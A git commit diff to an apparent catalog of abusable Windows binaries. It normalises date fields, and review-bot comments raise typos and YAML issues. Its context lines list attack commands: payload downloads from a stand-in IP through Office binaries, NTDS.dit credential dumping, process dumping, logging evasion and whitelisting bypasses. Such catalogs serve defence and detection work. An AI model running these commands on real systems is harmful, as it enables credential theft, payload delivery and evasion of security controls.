This commit is contained in:
Wietze
2021-01-10 15:04:52 +00:00
parent de50a47957
commit 14dca38278
147 changed files with 407 additions and 407 deletions

View File

@@ -2,7 +2,7 @@
Name: AgentExecutor.exe
Description: Intune Management Extension included on Intune Managed Devices
Author: 'Eleftherios Panos'
Created: '23/07/2020'
Created: 2020-07-23
Commands:
- Command: AgentExecutor.exe -powershell "c:\temp\malicious.ps1" "c:\temp\test.log" "c:\temp\test1.log" "c:\temp\test2.log" 60000 "C:\Windows\SysWOW64\WindowsPowerShell\v1.0" 0 1
Description: Spawns powershell.exe and executes a provided powershell script with ExecutionPolicy Bypass argument
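Review bot: The `Created` change in this hunk is not only a quote removal but a format change, from `'23/07/2020'` to `2020-07-23`; since the day field is 23 the DD/MM/YYYY reading is unambiguous here, but the other 146 files should be checked for dates where day and month are both 12 or less. Note also that an unquoted `2020-07-23` is a YAML 1.1 timestamp, so parsers such as PyYAML and Psych will now return a date object rather than a string for every `Created` field; any tooling that string-compares or prefixes this value needs to be adjusted, or the values should stay quoted if a string is intended.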
@@ -22,12 +22,12 @@ Commands:
OperatingSystem: Windows 10
Full_Path:
- Path: C:\Program Files (x86)\Microsoft Intune Management Extension
Code_Sample:
Code_Sample:
- Code:
Detection:
Detection:
- IOC:
Resources:
- Link:
- Link:
Acknowledgement:
- Person: Eleftherios Panos
Handle: '@lefterispan'
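Review bot: The `Code_Sample:`, `Detection:` and `- Link:` lines appear identical on both sides of this hunk, so the change is presumably trailing-whitespace removal that the rendering hides; worth saying so in the commit message. While touching this entry, the `- Code:`, `- IOC:` and `- Link:` values are all empty, which leaves a defender with no detection guidance for AgentExecutor.exe; at minimum a process-tree IOC such as `AgentExecutor.exe spawned powershell.exe` in the style used by the other entries would be useful.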

View File

@@ -1,8 +1,8 @@
---
Name: Appvlp.exe
Description: Application Virtualization Utility Included with Microsoft Office 2016
Description: Application Virtualization Utility Included with Microsoft Office 2016
Author: ''
Created: '2018-05-25'
Created: 2018-05-25
Commands:
- Command: AppVLP.exe \\webdav\calc.bat
Usecase: Execution of BAT file hosted on Webdav server.
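Review bot: `Author: ''` is an empty string rather than a missing field, and the `Description` line is repeated unchanged on both sides, so this hunk is also a whitespace-only edit apart from the date. Consider either filling in the author or dropping the key, since an empty quoted string will pass a "field present" check while carrying no information.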

View File

@@ -2,7 +2,7 @@
Name: Bginfo.exe
Description: Background Information Utility included with SysInternals Suite
Author: 'Oddvar Moe'
Created: '2018-05-25'
Created: 2018-05-25
Commands:
- Command: bginfo.exe bginfo.bgi /popup /nolicprompt
Description: Execute VBscript code that is referenced within the bginfo.bgi file.

View File

@@ -2,7 +2,7 @@
Name: Cdb.exe
Description: Debugging tool included with Windows Debugging Tools.
Author: 'Oddvar Moe'
Created: '2018-05-25'
Created: 2018-05-25
Commands:
- Command: cdb.exe -cf x64_calc.wds -o notepad.exe
Description: Launch 64-bit shellcode from the x64_calc.wds file using cdb.exe.
@@ -26,4 +26,4 @@ Resources:
Acknoledgement:
- Person: Matt Graeber
Handle: '@mattifestation'
---
---
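Review bot: The context line `Acknoledgement:` is misspelled; every other file in this commit uses `Acknowledgement:`, so any consumer keyed on the correct spelling will silently drop the credit for this entry. Fix the key while the file is being touched. The trailing `---` also starts a second, empty YAML document rather than closing the first; harmless for most loaders, but a `load_all` will yield a `None` document after the entry.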

View File

@@ -2,7 +2,7 @@
Name: csi.exe
Description: Command line interface included with Visual Studio.
Author: 'Oddvar Moe'
Created: '2018-05-25'
Created: 2018-05-25
Commands:
- Command: csi.exe file
Description: Use csi.exe to run unsigned C# code.

View File

@@ -2,7 +2,7 @@
Name: DefaultPack.EXE
Description: This binary can be downloaded along side multiple software downloads on the microsoft website. It gets downloaded when the user forgets to uncheck the option to set Bing as the default search provider.
Author: '@checkymander'
Created: '2020-10-01'
Created: 2020-10-01
Commands:
- Command: DefaultPack.EXE /C:"process.exe args"
Description: Use DefaultPack.EXE to execute arbitrary binaries, with added argument support.
@@ -14,9 +14,9 @@ Commands:
OperatingSystem: Windows
Full_Path:
- Path: C:\Program Files (x86)\Microsoft\DefaultPack\
Code_Sample:
Code_Sample:
- Code:
Detection:
Detection:
- IOC: DefaultPack.EXE spawned an unknown process
Resources:
- Link: https://twitter.com/checkymander/status/1311509470275604480.
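Review bot: The resource link `https://twitter.com/checkymander/status/1311509470275604480.` ends with a period, which becomes part of the URL when the value is rendered or followed; drop the trailing dot. The repeated `Code_Sample:` and `Detection:` lines indicate the rest of the hunk is a whitespace-only change.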

View File

@@ -2,7 +2,7 @@
Name: Devtoolslauncher.exe
Description: Binary will execute specified binary. Part of VS/VScode installation.
Author: 'felamos'
Created: '2019-10-04'
Created: 2019-10-04
Commands:
- Command: devtoolslauncher.exe LaunchForDeploy [PATH_TO_BIN] "argument here" test
Description: The above binary will execute other binary.
@@ -24,7 +24,7 @@ Full_Path:
- Path: 'c:\windows\system32\devtoolslauncher.exe'
Code_Sample:
- Code:
Detection:
Detection:
- IOC: DeveloperToolsSvc.exe spawned an unknown process
Resources:
- Link: https://twitter.com/_felamos/status/1179811992841797632

View File

@@ -2,7 +2,7 @@
Name: dnx.exe
Description: .Net Execution environment file included with .Net.
Author: 'Oddvar Moe'
Created: '2018-05-25'
Created: 2018-05-25
Commands:
- Command: dnx.exe consoleapp
Description: Execute C# code located in the consoleapp folder via 'Program.cs' and 'Project.json' (Note - Requires dependencies)
@@ -23,4 +23,4 @@ Resources:
Acknowledgement:
- Person: Matt Nelson
Handle: '@enigma0x3'
---
---

View File

@@ -2,7 +2,7 @@
Name: Dotnet.exe
Description: dotnet.exe comes with .NET Framework
Author: 'felamos'
Created: '2019-11-12'
Created: 2019-11-12
Commands:
- Command: dotnet.exe [PATH_TO_DLL]
Description: dotnet.exe will execute any dll even if applocker is enabled.
@@ -28,7 +28,7 @@ Commands:
OperatingSystem: Windows 10 with .NET Core installed
Full_Path:
- Path: 'C:\Program Files\dotnet\dotnet.exe'
Detection:
Detection:
- IOC: dotnet.exe spawned an unknown process
Resources:
- Link: https://twitter.com/_felamos/status/1204705548668555264
@@ -38,5 +38,5 @@ Acknowledgement:
- Person: felamos
Handle: '@_felamos'
- Person: Jimmy
Handle: '@bohops'
Handle: '@bohops'
---

View File

@@ -1,8 +1,8 @@
---
Name: Dxcap.exe
Description: DirectX diagnostics/debugger included with Visual Studio.
Description: DirectX diagnostics/debugger included with Visual Studio.
Author: 'Oddvar Moe'
Created: '2018-05-25'
Created: 2018-05-25
Commands:
- Command: Dxcap.exe -c C:\Windows\System32\notepad.exe
Description: Launch notepad as a subprocess of Dxcap.exe
@@ -24,4 +24,4 @@ Resources:
Acknowledgement:
- Person: Matt harr0ey
Handle: '@harr0ey'
---
---

View File

@@ -2,7 +2,7 @@
Name: Excel.exe
Description: Microsoft Office binary
Author: 'Reegun J (OCBC Bank)'
Created: '2019-07-19'
Created: 2019-07-19
Commands:
- Command: Excel.exe http://192.168.1.10/TeamsAddinLoader.dll
Description: Downloads payload from remote server
@@ -38,4 +38,4 @@ Resources:
Acknowledgement:
- Person: 'Reegun J (OCBC Bank)'
Handle: '@reegun21'
---
---

View File

@@ -2,7 +2,7 @@
Name: Mftrace.exe
Description: Trace log generation tool for Media Foundation Tools.
Author: 'Oddvar Moe'
Created: '2018-05-25'
Created: 2018-05-25
Commands:
- Command: Mftrace.exe cmd.exe
Description: Launch cmd.exe as a subprocess of Mftrace.exe.

View File

@@ -2,7 +2,7 @@
Name: Msdeploy.exe
Description: Microsoft tool used to deploy Web Applications.
Author: 'Oddvar Moe'
Created: '2018-05-25'
Created: 2018-05-25
Commands:
- Command: msdeploy.exe -verb:sync -source:RunCommand -dest:runCommand="c:\temp\calc.bat"
Description: Launch calc.bat via msdeploy.exe.

View File

@@ -2,7 +2,7 @@
Name: msxsl.exe
Description: Command line utility used to perform XSL transformations.
Author: 'Oddvar Moe'
Created: '2018-05-25'
Created: 2018-05-25
Commands:
- Command: msxsl.exe customers.xml script.xsl
Description: Run COM Scriptlet code within the script.xsl file (local).

View File

@@ -2,7 +2,7 @@
Name: ntdsutil.exe
Description: Command line utility used to export Actove Directory.
Author: 'Tony Lambert'
Created: '2020-01-10'
Created: 2020-01-10
Commands:
- Command: ntdsutil.exe "ac i ntds" "ifm" "create full c:\" q q
Description: Dump NTDS.dit into folder
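Review bot: The `Description` context line reads `Actove Directory`; correct to `Active Directory` while the file is being edited, since this text is shown verbatim on the project site.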
@@ -23,4 +23,4 @@ Resources:
Acknowledgement:
- Person: Sean Metcalf
Handle: '@PyroTek3'
---
---

View File

@@ -2,7 +2,7 @@
Name: Powerpnt.exe
Description: Microsoft Office binary.
Author: 'Reegun J (OCBC Bank)'
Created: '2019-07-19'
Created: 2019-07-19
Commands:
- Command: Powerpnt.exe "http://192.168.1.10/TeamsAddinLoader.dll"
Description: Downloads payload from remote server
@@ -34,4 +34,4 @@ Resources:
Acknowledgement:
- Person: Reegun J (OCBC Bank)
Handle: '@reegun21'
---
---
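Review bot: `Person: Reegun J (OCBC Bank)` is unquoted here but quoted as `'Reegun J (OCBC Bank)'` in the Excel.exe and Winword.exe entries by the same author; both parse to the same string, but a normalisation commit is the place to pick one form so the three entries stay consistent.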

View File

@@ -2,7 +2,7 @@
Name: rcsi.exe
Description: Non-Interactive command line inerface included with Visual Studio.
Author: 'Oddvar Moe'
Created: '2018-05-25'
Created: 2018-05-25
Commands:
- Command: rcsi.exe bypass.csx
Description: Use embedded C# within the csx script to execute the code.
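Review bot: `inerface` in the `Description` context line should be `interface`.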

View File

@@ -2,7 +2,7 @@
Name: Sqldumper.exe
Description: Debugging utility included with Microsoft SQL.
Author: 'Oddvar Moe'
Created: '2018-05-25'
Created: 2018-05-25
Commands:
- Command: sqldumper.exe 464 0 0x0110
Description: Dump process by PID and create a dump file (Appears to create a dump file called SQLDmprXXXX.mdmp).

View File

@@ -2,7 +2,7 @@
Name: Sqlps.exe
Description: Tool included with Microsoft SQL Server that loads SQL Server cmdlets. Microsoft SQL Server\100 and 110 are Powershell v2. Microsoft SQL Server\120 and 130 are Powershell version 4. Replaced by SQLToolsPS.exe in SQL Server 2016, but will be included with installation for compatability reasons.
Author: 'Oddvar Moe'
Created: '2018-05-25'
Created: 2018-05-25
Commands:
- Command: Sqlps.exe -noprofile
Description: Run a SQL Server PowerShell mini-console without Module and ScriptBlock Logging.
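Review bot: `compatability` in the `Description` line should be `compatibility`, and `Powershell` appears with inconsistent casing (`Powershell v2`, `Powershell version 4`) where the rest of the corpus uses `PowerShell`.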

View File

@@ -2,7 +2,7 @@
Name: SQLToolsPS.exe
Description: Tool included with Microsoft SQL that loads SQL Server cmdlts. A replacement for sqlps.exe. Successor to sqlps.exe in SQL Server 2016+.
Author: 'Oddvar Moe'
Created: '2018-05-25'
Created: 2018-05-25
Commands:
- Command: SQLToolsPS.exe -noprofile -command Start-Process calc.exe
Description: Run a SQL Server PowerShell mini-console without Module and ScriptBlock Logging.
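Review bot: `cmdlts` in the `Description` line should be `cmdlets`; the same sentence also states the replacement relationship twice ("A replacement for sqlps.exe. Successor to sqlps.exe in SQL Server 2016+"), which can be collapsed to one clause.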
@@ -24,4 +24,4 @@ Resources:
Acknowledgement:
- Person: Pierre-Alexandre Braeken
Handle: '@pabraeken'
---
---

View File

@@ -2,14 +2,14 @@
Name: Squirrel.exe
Description: Binary to update the existing installed Nuget/squirrel package. Part of Microsoft Teams installation.
Author: 'Reegun J (OCBC Bank) - @reegun21'
Created: '2019-06-26'
Created: 2019-06-26
Commands:
- Command: squirrel.exe --download [url to package]
Description: The above binary will go to url and look for RELEASES file and download the nuget package.
Usecase: Download binary
Category: Download
Privileges: User
MitreID: T1218
MitreID: T1218
MitreLink: https://attack.mitre.org/techniques/T1218/
OperatingSystem: Windows 7 and up with Microsoft Teams installed
- Command: squirrel.exe --update [url to package]
@@ -46,9 +46,9 @@ Commands:
OperatingSystem: Windows 7 and up with Microsoft Teams installed
Full_Path:
- Path: '%localappdata%\Microsoft\Teams\current\Squirrel.exe'
Code_Sample:
Code_Sample:
- Code: https://github.com/jreegun/POC-s/tree/master/nuget-squirrel
Detection:
Detection:
- IOC: Update.exe spawned an unknown process
Resources:
- Link: https://www.youtube.com/watch?v=rOP3hnkj7ls
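Review bot: The `- IOC: Update.exe spawned an unknown process` line sits in the Squirrel.exe entry while the `Full_Path` is `%localappdata%\Microsoft\Teams\current\Squirrel.exe`; if the intent is that Squirrel.exe is the same binary as Update.exe, the detection should say so explicitly, otherwise the IOC should name `Squirrel.exe` so a rule built from it matches the process actually described.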

View File

@@ -2,7 +2,7 @@
Name: te.exe
Description: Testing tool included with Microsoft Test Authoring and Execution Framework (TAEF).
Author: 'Oddvar Moe'
Created: '2018-05-25'
Created: 2018-05-25
Commands:
- Command: te.exe bypass.wsc
Description: Run COM Scriptlets (e.g. VBScript) by calling a Windows Script Component (WSC) file.

View File

@@ -2,7 +2,7 @@
Name: Tracker.exe
Description: Tool included with Microsoft .Net Framework.
Author: 'Oddvar Moe'
Created: '2018-05-25'
Created: 2018-05-25
Commands:
- Command: Tracker.exe /d .\calc.dll /c C:\Windows\write.exe
Description: Use tracker.exe to proxy execution of an arbitrary DLL into another process. Since tracker.exe is also signed it can be used to bypass application whitelisting solutions.

View File

@@ -2,14 +2,14 @@
Name: Update.exe
Description: Binary to update the existing installed Nuget/squirrel package. Part of Microsoft Teams installation.
Author: 'Oddvar Moe'
Created: '2019-06-26'
Created: 2019-06-26
Commands:
- Command: Update.exe --download [url to package]
Description: The above binary will go to url and look for RELEASES file and download the nuget package.
Usecase: Download binary
Category: Download
Privileges: User
MitreID: T1218
MitreID: T1218
MitreLink: https://attack.mitre.org/techniques/T1218/
OperatingSystem: Windows 7 and up with Microsoft Teams installed
- Command: Update.exe --update=[url to package]
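Review bot: The `--update=[url to package]` form here (with `=`) differs from `--update [url to package]` (space-separated) in the Squirrel.exe entry for the same functionality; confirm which syntax the binary accepts, or document that both work, so the two entries do not contradict each other. The duplicated `MitreID: T1218` line shows the rest of the hunk is a whitespace-only change.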
@@ -94,9 +94,9 @@ Commands:
OperatingSystem: Windows 7 and up with Microsoft Teams installed
Full_Path:
- Path: '%localappdata%\Microsoft\Teams\update.exe'
Code_Sample:
Code_Sample:
- Code: https://github.com/jreegun/POC-s/tree/master/nuget-squirrel
Detection:
Detection:
- IOC: Update.exe spawned an unknown process
Resources:
- Link: https://www.youtube.com/watch?v=rOP3hnkj7ls

View File

@@ -2,7 +2,7 @@
Name: vsjitdebugger.exe
Description: Just-In-Time (JIT) debugger included with Visual Studio
Author: 'Oddvar Moe'
Created: '2018-05-25'
Created: 2018-05-25
Commands:
- Command: Vsjitdebugger.exe calc.exe
Description: Executes calc.exe as a subprocess of Vsjitdebugger.exe.
@@ -17,7 +17,7 @@ Full_Path:
Code_Sample:
- Code:
Detection:
- IOC:
- IOC:
Resources:
- Link: https://twitter.com/pabraeken/status/990758590020452353
Acknowledgement:
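Review bot: The `- IOC:` value is empty on both sides of this hunk, so the vsjitdebugger.exe entry ships without detection guidance; a process-ancestry IOC in the style of the other entries (for example `Vsjitdebugger.exe spawned an unknown process`) would fit the existing `Description` of the command.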

View File

@@ -2,7 +2,7 @@
Name: Winword.exe
Description: Microsoft Office binary
Author: 'Reegun J (OCBC Bank)'
Created: '2019-07-19'
Created: 2019-07-19
Commands:
- Command: winword.exe "http://192.168.1.10/TeamsAddinLoader.dll"
Description: Downloads payload from remote server
@@ -38,4 +38,4 @@ Resources:
Acknowledgement:
- Person: 'Reegun J (OCBC Bank)'
Handle: '@reegun21'
---
---

View File

@@ -2,7 +2,7 @@
Name: Wsl.exe
Description: Windows subsystem for Linux executable
Author: 'Matthew Brown'
Created: '2019-06-27'
Created: 2019-06-27
Commands:
- Command: wsl.exe -e /mnt/c/Windows/System32/calc.exe
Description: Executes calc.exe from wsl.exe